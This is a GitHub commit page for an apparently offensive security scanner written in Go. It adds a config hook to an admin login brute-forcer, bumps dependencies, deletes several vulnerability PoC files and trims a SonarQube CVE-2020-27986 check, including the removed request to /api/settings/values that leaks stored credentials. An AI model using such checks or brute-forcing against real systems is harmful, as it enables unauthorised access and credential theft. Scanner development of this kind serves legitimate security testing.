Skip to content

Commit 6a57b04

Browse files
committed
add log4j小工具 2022-10-14
1 parent a254dee commit 6a57b04

File tree

449 files changed

+107503
-456
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

449 files changed

+107503
-456
lines changed

brute/admin_brute.go

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -212,3 +212,9 @@ func Admin_brute(u string) (username string, password string, loginurl string) {
212212
}
213213
return "", "", ""
214214
}
215+
216+
func init() {
217+
util.RegInitFunc(func() {
218+
SkipAdminBrute = util.GetValAsBool("SkipAdminBrute")
219+
})
220+
}

go.mod

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -100,7 +100,7 @@ require (
100100
github.com/google/go-github v17.0.0+incompatible
101101
github.com/gorilla/websocket v1.5.0
102102
github.com/gosnmp/gosnmp v1.35.0
103-
github.com/hktalent/PipelineHttp v0.0.0-20221013012646-f1b33c0f6f66
103+
github.com/hktalent/PipelineHttp v0.0.0-20221014032902-e7c54f476ebf
104104
github.com/hktalent/goSqlite_gorm v1.1.4
105105
github.com/hktalent/jarm-go v0.0.0-20220918133110-7801447b6267
106106
github.com/huin/asn1ber v0.0.0-20120622192748-af09f62e6358

go.sum

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -541,6 +541,8 @@ github.com/hktalent/PipelineHttp v0.0.0-20221007051907-72402204b668 h1:10csPasxw
541541
github.com/hktalent/PipelineHttp v0.0.0-20221007051907-72402204b668/go.mod h1:ncw1+ugTc5GPQLUHHI7uWrgW2KWBppDBWwwjC984QJg=
542542
github.com/hktalent/PipelineHttp v0.0.0-20221013012646-f1b33c0f6f66 h1:D/PD14cl6K/udXTn1IQ25obI6bjRr+fmxeVnHOQGYlg=
543543
github.com/hktalent/PipelineHttp v0.0.0-20221013012646-f1b33c0f6f66/go.mod h1:ncw1+ugTc5GPQLUHHI7uWrgW2KWBppDBWwwjC984QJg=
544+
github.com/hktalent/PipelineHttp v0.0.0-20221014032902-e7c54f476ebf h1:WPENZPWsMew6/WRc7V796QNIqUk1d0jDHK3GX1pdfm0=
545+
github.com/hktalent/PipelineHttp v0.0.0-20221014032902-e7c54f476ebf/go.mod h1:ncw1+ugTc5GPQLUHHI7uWrgW2KWBppDBWwwjC984QJg=
544546
github.com/hktalent/go-utils v0.0.0-20221004095234-2e23f13b429d h1:z1IUP4hqn0LGgs78bU2gSlna92/p+RlB0MSZ+RxSmCo=
545547
github.com/hktalent/go-utils v0.0.0-20221004095234-2e23f13b429d/go.mod h1:Du0lF0ZtTONXpWydjmnsL71He+zlimYLmTmAZta19ZA=
546548
github.com/hktalent/go4Hacker v0.0.0-20220610050413-bb38dc39c4b9 h1:OAnRWLddVE6FPOeIHJcgDYWoQWpvh/F5w/1MEJikWIQ=

lib/goby/goby_pocs/D-Link DCS系列监控 账号密码信息泄露漏洞 CNVD-2020-25078.json

Lines changed: 0 additions & 77 deletions
This file was deleted.

lib/goby/goby_pocs/Hsmedia_Hgateway_Default_account.json

Lines changed: 0 additions & 55 deletions
This file was deleted.

lib/goby/goby_pocs/SonarQube_unauth_CVE_2020_27986.json

Lines changed: 4 additions & 48 deletions
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@
44
"Tags": [
55
"unauth"
66
],
7-
"GobyQuery": "app=\"SonarQube-code management\"",
7+
"GobyQuery": "app=\"SonarQube\"",
88
"Description": "SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI.",
99
"Product": "SonarQube",
1010
"Homepage": "https://www.sonarqube.org/",
@@ -14,7 +14,7 @@
1414
"References": [
1515
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27986"
1616
],
17-
"HasExp": true,
17+
"HasExp": false,
1818
"ExpParams": null,
1919
"ExpTips": {
2020
"Type": "",
@@ -64,50 +64,6 @@
6464
]
6565
}
6666
],
67-
"ExploitSteps": [
68-
"AND",
69-
{
70-
"Request": {
71-
"method": "GET",
72-
"uri": "/api/settings/values",
73-
"follow_redirect": true,
74-
"header": null,
75-
"data_type": "text",
76-
"data": "",
77-
"set_variable": []
78-
},
79-
"ResponseTest": {
80-
"type": "group",
81-
"operation": "AND",
82-
"checks": [
83-
{
84-
"type": "item",
85-
"variable": "$code",
86-
"operation": "==",
87-
"value": "200",
88-
"bz": ""
89-
},
90-
{
91-
"type": "item",
92-
"variable": "$body",
93-
"operation": "contains",
94-
"value": "sonaranalyzer-cs.nuget.packageVersion",
95-
"bz": ""
96-
},
97-
{
98-
"type": "item",
99-
"variable": "$body",
100-
"operation": "contains",
101-
"value": "sonar.core.id",
102-
"bz": ""
103-
}
104-
]
105-
},
106-
"SetVariable": [
107-
"output|lastbody|regex|"
108-
]
109-
}
110-
],
111-
"PostTime": "2022-06-25 20:10:24",
112-
"GobyVersion": "1.9.323"
67+
"PostTime": "2021-11-29 15:03:58",
68+
"GobyVersion": "1.9.310"
11369
}

lib/goby/goby_pocs/VENGD_Arbitrary_File_Upload.json

Lines changed: 0 additions & 161 deletions
This file was deleted.

0 commit comments

Comments
 (0)